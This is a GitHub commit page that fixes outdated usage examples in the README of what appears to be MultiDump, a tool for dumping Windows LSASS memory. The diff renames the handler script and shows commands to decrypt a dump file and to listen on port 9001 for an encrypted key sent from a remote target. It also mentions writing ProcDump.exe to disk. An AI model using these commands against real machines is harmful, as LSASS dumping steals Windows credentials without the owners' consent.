Skip to content

Commit

Permalink
Update README.md
Browse files Browse the repository at this point in the history
Fix outdated examples
  • Loading branch information
Xre0uS authored Jul 3, 2024
1 parent 9613a7d commit 9159451
Showing 1 changed file with 2 additions and 2 deletions.
4 changes: 2 additions & 2 deletions README.md
Original file line number Diff line number Diff line change
Expand Up @@ -69,15 +69,15 @@ MultiDump.exe
```
```bash
./ProcDumpHandler.py -f dciqjp.dat -k 91ea54633cd31cc23eb3089928e9cd5af396d35ee8f738d8bdf2180801ee0cb1bae8f0cc4cc3ea7e9ce0a74876efe87e2c053efa80ee1111c4c4e7c640c0e33e
./MultiDumpHandler.py -l dciqjp.dat -k 91ea54633cd31cc23eb3089928e9cd5af396d35ee8f738d8bdf2180801ee0cb1bae8f0cc4cc3ea7e9ce0a74876efe87e2c053efa80ee1111c4c4e7c640c0e33e
```
If `--procdump` is used, `ProcDump.exe` will be writtern to disk to dump LSASS.
In remote mode, MultiDump connects to the handler's listener.
```bash
./MultidumpHandler.py -r 9001
./MultiDumpHandler.py -r 9001
[i] Listening on port 9001 for encrypted key...
```
Expand Down

0 comments on commit 9159451

Please sign in to comment.